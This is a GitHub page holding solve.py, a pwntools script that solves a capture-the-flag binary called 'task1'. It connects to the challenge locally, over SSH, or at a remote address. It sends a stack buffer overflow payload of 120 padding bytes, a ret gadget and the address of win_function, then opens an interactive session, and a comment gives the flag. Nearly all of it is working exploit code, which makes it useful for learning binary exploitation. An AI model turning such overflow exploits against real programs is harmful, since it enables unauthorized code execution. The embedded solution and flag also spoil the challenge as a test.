-
Notifications
You must be signed in to change notification settings - Fork 6
/
solve.py
executable file
·78 lines (51 loc) · 1.65 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python
from pwn import *
from time import sleep
exe = ELF("./task1")
context.binary = exe
sshc = None
r = None
nc = "nc 34.155.40.100 1234"
ssh_conn = ('HOST', 22, 'USER', 'PASS', 'BIN_NAME')
SLEEP_TIME = 0
# Communication ----------------------------------------------------------
tobytes = lambda x: x if isinstance(x, bytes) else str(x).encode()
readl = lambda : r.readline()
recvuntil = lambda x: r.recvuntil(tobytes(x))
def sendl(x):
sleep(SLEEP_TIME)
r.sendline(tobytes(x))
def send(x):
sleep(SLEEP_TIME)
r.send(tobytes(x))
# Logging ----------------------------------------------------------------
def log(msg, value, length=25):
print(msg, ' '*(length - len(msg)), ':', value)
def logh(msg, value):
log(msg, hex(value))
# Helpers ----------------------------------------------------------------
def padPayload(s, size=70, used=0, extra=0):
assert len(s) < size, "Payload length bigger than size! ("+str(size)+")"
return b'A'*(size - len(s) - 8*used - extra)
def conn():
global r, nc, ssh_conn, sshc
if args.LOCAL:
r = process([exe.path])
elif args.SSH:
sshc = ssh(ssh_conn[2], ssh_conn[0], ssh_conn[1], ssh_conn[3])
r = sshc.process([ssh_conn[4]])
else:
host = nc.replace('nc ', '').split(' ')
r = remote(host[0], int(host[1]))
return r
def main():
global r
r = conn()
ret = 0x000000000040101a
payload = b"a"*120
payload += p64(ret)
payload += p64(exe.symbols.win_function)
r.sendline(payload)
r.interactive() # FLAG{buffer_overflows_never_gets_old}
if __name__ == "__main__":
main()